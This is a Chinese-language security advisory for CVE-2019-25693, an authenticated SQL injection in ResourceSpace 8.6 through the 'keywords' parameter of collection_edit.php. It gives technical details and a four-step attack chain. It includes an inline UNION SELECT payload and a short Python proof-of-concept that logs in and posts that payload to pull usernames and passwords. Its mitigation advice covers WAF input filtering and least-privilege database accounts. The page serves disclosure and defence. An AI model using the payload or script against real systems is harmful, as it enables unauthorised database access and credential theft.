CVE-2019-25693 CVSS 7.1 高危

CVE-2019-25693 ResourceSpace SQL注入漏洞

披露日期: 2026-04-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2019-25693

漏洞类型

SQL注入

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

ResourceSpace

漏洞概述

ResourceSpace 8.6版本存在严重的SQL注入漏洞，漏洞编号为CVE-2019-25693。该漏洞允许经过身份验证的攻击者利用`collection_edit.php`文件中的`keywords`参数执行任意SQL查询。由于系统未正确过滤用户输入，攻击者可发送特制的POST请求注入恶意代码，进而窃取数据库中的敏感信息，如模式名称、用户凭证及其他机密数据，该漏洞CVSS评分为7.1，属于高危级别。

技术细节

该漏洞的根源在于ResourceSpace 8.6版本在处理`collection_edit.php`模块的收藏夹编辑功能时，未能对用户输入进行有效的安全过滤。具体而言，后端代码直接将POST请求中的`keywords`参数值拼接到SQL查询语句中，未采用参数化查询或转义机制，导致产生了经典的SQL注入漏洞。攻击者首先需要获取一个低权限的账号登录系统，随后构造包含SQL注入代码的恶意数据包。例如，攻击者可以在`keywords`字段输入`' UNION SELECT username, password FROM users-- -`。当服务器端处理此请求时，恶意SQL语句被执行，攻击者即可提取数据库中的敏感信息，包括但不限于用户凭证、数据库架构和其他机密业务数据，严重威胁系统的数据机密性。

攻击链分析

STEP 1

信息收集

攻击者识别目标系统运行ResourceSpace 8.6版本，并确定存在collection_edit.php接口。

STEP 2

获取访问权限

攻击者通过注册或社会工程学获取一个低权限的用户账号，并成功登录系统。

STEP 3

漏洞利用

攻击者构造包含恶意SQL注入Payload的POST请求，发送至collection_edit.php的keywords参数。

STEP 4

数据窃取

服务器执行恶意SQL语句，攻击者通过响应回显或盲注技术提取数据库中的敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://target.com/collection_edit.php"
session = requests.Session()

# Attacker credentials (Low privilege required)
login_data = {
    "username": "attacker",
    "password": "password"
}
# Login step (simplified)
session.post("http://target.com/login.php", data=login_data)

# Malicious payload for SQL Injection in 'keywords' parameter
# Using boolean-based or union-based injection to extract data
payload = "1' UNION SELECT NULL, username, password FROM users-- -"

# Exploit request
exploit_data = {
    "keywords": payload,
    "ref": "collection_id"
}

response = session.post(target_url, data=exploit_data)

# Check if data is leaked in response
if "admin" in response.text:
    print("Vulnerability exploited successfully!")
else:
    print("Exploit failed.")

影响范围

ResourceSpace 8.6

防御指南

临时缓解措施

建议在应用层或WAF上部署严格的输入验证规则，拦截针对`keywords`参数的常见SQL注入攻击特征（如单引号、UNION SELECT等）。同时，应暂时限制普通用户对收藏夹编辑功能的访问权限，并加强数据库账户的权限隔离，避免Web应用直接使用高权限数据库用户连接。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2019-25693
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2019-25693
3 Details https://www.cvedetails.com/cve/CVE-2019-25693/
4 VulDB https://vuldb.com/cve/CVE-2019-25693
5 Link https://www.exploit-db.com/exploits/46274
6 Link https://www.resourcespace.com/
7 Link https://www.resourcespace.com/get
8 Link https://www.vulncheck.com/advisories/resourcespace-sql-injection-via-collection-edit-php

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表